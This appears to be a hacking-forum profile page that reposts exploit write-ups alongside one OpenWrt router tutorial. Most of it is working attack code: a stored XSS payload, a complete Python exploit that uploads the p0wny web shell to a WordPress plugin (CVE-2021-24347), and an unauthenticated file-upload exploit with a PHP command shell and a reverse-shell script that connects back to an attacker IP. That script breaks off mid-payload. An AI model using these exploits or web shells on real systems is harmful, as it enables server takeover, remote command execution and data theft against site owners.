Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Employee Record Management System 1.2 - Stored Cross-Site Scripting (XSS) # Date: 07 July 2021 # Exploit Author: Subhadip Nag (mrl0s3r) # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/ # Tested on: Server: XAMPP # Description # Employee Record Management System 1.2 is vulnerable to stored cross site scripting (xss) in the Edit My Education because of insufficient user supplied data. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/ERMSP/erms/loginerms.php 2) Login: Login as a User(given username and password) 3) Go To Edit My Education and Edit My Exp 4) Enter the payload: <script>alert(1)</script> 5) Click Update 6) Go to 'My Education' option 7) Our XSS attack successful # PoC image 1) https://ibb.co/LS78xjX 2) https://ibb.co/9G0Pbxb
  2. HireHackking

    Title: Raspberry Pi 4B build OpenWrt soft routing—configure server

    HireHackking posted a blog entry in Hacker Technology
    In this article, we will take a look at Openwrt based on Raspberry Pi 4B. Openwrt is a famous router management system. It is used by many manufacturers due to its open source and third-party compilation advantages. I happened to have a Raspberry Pi 4B on hand, and I flashed Openwrt to do soft routing. At the same time, try to add various plugins to it. Accessories Preparation Raspberry Pi 4B development board 32G memory card one network cable Select firmware Here I am using Lean's Raspberry Pi openwrt firmware. Author's project address: https://github.com/coolsnowwolf/openwrt Flash firmware Open the tool win32, select the firmware and disk location as follows, click Write After the write is successful, insert the card into the Raspberry Pi. Start the Raspberry Pi. Login the background Connect the Raspberry Pi's network port to your computer with a network cable, and then enter 192.168.1.1 in the browser. If the connection is fine, it will jump directly to the openwrt background interface. Default username: root Default login password: password Add interface Add a wan port, the protocol is DHCP client, check the Ethernet adapter eth0 in the physical settings The Advantages of Openwrt The difference between openwrt and other firmware is that it can install many plug-ins. Such as advertising blocking, cloud disk download acceleration, etc. Network storage Of course, we can also use Nginx and PHP environments on the router. In other words, we can build the router into a small server. Configure ssh Why can’t you log in to ssh for your own things? Many router firmware cannot be logged in with ssh, while openwrt is very simple. Configure ssh Log in ssh Build a blog Modify nginx configuration file user root root; worker_processes 1; pid /var/run/nginx_kodexplorer.pid; events { worker_connections 1024; } http { include /etc/nginx/mime.types; sendfile on; keepalive_timeout 65; server { listen 8081; server_name localhost; location/{ root /mnt/www/; index index.html index.htm index.php; } error_page 500 502 503 504 /50x.html; location=/50x.html { root html; } location ~ \.php$ { root /mnt/www/; try_files $uri=404; # PHP file does not exist and returns 404 fastcgi_pass unix:/var/run/php7-fpm.sock; # Execute PHP through Unix sockets fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; # Fix Nginx fastcgi vulnerability include /etc/nginx/fastcgi_params; } } } Test probe file Installing typecho In this way, an inconspicuous router is built into a server.
  3. HireHackking

    Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated) # Date 07.07.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://smartypantsplugins.com/ # Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip # Version: Before 4.22 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24347 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24347/README.md ''' Description: The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP". ''' ''' Banner: ''' banner = """ ______ _______ ____ ___ ____ _ ____ _ _ _____ _ _ _____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || ||___ /| || |___ | | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_ |_ \| || |_ / / | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _|__) |__ _/ / \____| \_/ |_____| |_____|\___/_____|_| |_____| |_||____/ |_|/_/ * Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated) * @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') print('[*] Starting Exploit:') print('') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header = auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit() ''' Retrieve User ID from the widget: ''' user_id_text = session.get('http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview').text search_string = "<form><select name='user_uid' id='user_uid' class=''>" user_string = ">" + username user_id_text = user_id_text[user_id_text.find(search_string):] user_id_text = user_id_text[user_id_text.find(user_string) - 2: user_id_text.find(user_string)] user_id = user_id_text.replace("'", '') ''' Exploit: ''' exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview&id=' + user_id # Header (Exploit): Header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": exploit_url, "Content-Type": "multipart/form-data; boundary=---------------------------37032792112149247252673711332", "Origin": "http://" + target_ip, "Connection": "close", "Upgrade-Insecure-Requests": "1" } # Web Shell payload (p0wny shell): https://github.com/flozz/p0wny-shell shell_payload = "-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\r\n\r\na1b3bac1bc\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-name\"\r\n\r\nExploits\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"shell.pHP\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\r\n\r\nUpload\r\n-----------------------------37032792112149247252673711332--\r\n" # Exploit: session.post(exploit_url, headers=header, data=shell_payload) print('') print('[+] Exploit done !') print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/sp-client-document-manager/' + user_id + '/shell.php') print('')
  4. HireHackking

    Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated) # Date: 2021-07-07 # Exploit Author: faisalfs10x # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip # Version: 1.0 # Tested on: Windows 10, XAMPP """ ################ # Description # ################ 1. The admin panel UI login can be assessed at http://{ip}/scheduler/admin/login.php. Due to the client-side input validation implemented within scripts, it is possible to bypass and access the admin panel UI by making request to "http://localhost/scheduler/admin/?page=user" and removing the javascript tag '<script>location.href="http://localhost/scheduler/admin/login.php"</script>' in the server response body. For making the process easier, we can use burp "Match and Replace" option to automatically replace the javascript tag parts of responses body passing through the proxy. 2. The admin panel has an upload function of profile photo accessible at http://localhost/scheduler/admin/?page=user. An attacker could upload a malicious file such as shell.php with the Content-Type: image/png. Then, the attacker have to visit the uploaded profile photo to access the shell. ##################### # PoC for webshell # ##################### Request: ======== POST /scheduler/classes/Users.php?f=save HTTP/1.1 Host: localhost Content-Length: 721 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYrg9YZykFY2bmNqY Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/scheduler/admin/?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a5d66tonur7vir28rtoc049127 Connection: close ------WebKitFormBoundaryYrg9YZykFY2bmNqY Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundaryYrg9YZykFY2bmNqY Content-Disposition: form-data; name="firstname" Adminstrator ------WebKitFormBoundaryYrg9YZykFY2bmNqY Content-Disposition: form-data; name="lastname" Admin ------WebKitFormBoundaryYrg9YZykFY2bmNqY Content-Disposition: form-data; name="username" admin ------WebKitFormBoundaryYrg9YZykFY2bmNqY Content-Disposition: form-data; name="password" ------WebKitFormBoundaryYrg9YZykFY2bmNqY Content-Disposition: form-data; name="img"; filename="rev.php" Content-Type: image/png <?php echo "output: ";system($_GET['rev']); ?> # shell content here ------WebKitFormBoundaryYrg9YZykFY2bmNqY-- #################### # Webshell access: # #################### # Webshell access via: PoC: http://localhost/scheduler/uploads/{random_number}_rev.php?rev=whoami # Output: output: windows10/user """ ################################################## # Reverse shell exploit code for windows target: # ################################################## #!/usr/bin/python import requests import sys import string import random import urllib.request from requests_html import HTMLSession if len(sys.argv) < 4: print('\033[1;32;40m [+] Usage: python3 '+sys.argv[0]+' <target_ip> <attacker_ip> <attacker_port>') exit() RHOST = sys.argv[1] RPORT = '80' LHOST = sys.argv[2] LPORT = sys.argv[3] if not RHOST.startswith('http://') and not RHOST.startswith('https://'): RHOST = "http://" + RHOST # if not RHOST.endswith('/'): # RHOST = RHOST + "/" # RHOST = '127.0.0.1' # RPORT = '80' # LHOST = '192.168.8.117' # LPORT = '4444' shellpath = f"{RHOST}:{RPORT}/scheduler/uploads/" # shell will be uploaded here let = string.ascii_lowercase shellfilename = ''.join(random.choice(let) for i in range(5))+".php" # or just static shellfilename = 'rev.php' req_url = f"{RHOST}:{RPORT}/scheduler/classes/Users.php?f=save" # endpoint for uploading shell req_headers = {"sec-ch-ua": "\"Chromium\";v=\"91\", \" Not;A Brand\";v=\"99\"", "Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryYrg9YZykFY2bmNqY", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} req_data = "------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundaryYrg9YZykFY2bmNqY\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellfilename+"\"\r\nContent-Type: image/png\r\n\r\n<?php\r\n\r\nheader('Content-type: text/plain');\r\n$ip = \""+LHOST+"\"; \r\n$port = \""+LPORT+"\"; \r\n$payload = \"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